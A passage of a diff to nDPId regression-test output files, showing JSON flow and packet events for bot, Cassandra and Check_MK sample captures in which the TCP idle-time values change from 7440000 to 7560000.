00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645108240233,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1645108240233,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="}
00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}}
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","packets-captured":402,"packets-processed":402,"total-skipped-flows":0,"total-l4-data-len":407096,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1645108245896}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 402/402

24
test/results/cassandra.pcap.out
View File

@@ -1,17 +1,17 @@
00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cassandra.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1450889498032}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"}
00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"}
00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":286,"packets-processed":286,"total-skipped-flows":0,"total-l4-data-len":107108,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1450889698077}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 286/286

12
test/results/check_mk_new.pcap.out
View File

@@ -1,11 +1,11 @@
00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"check_mk_new.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1512031663734}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1512031663734,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1512031663734,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"}
00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1512031663734,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1512031663734,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="}
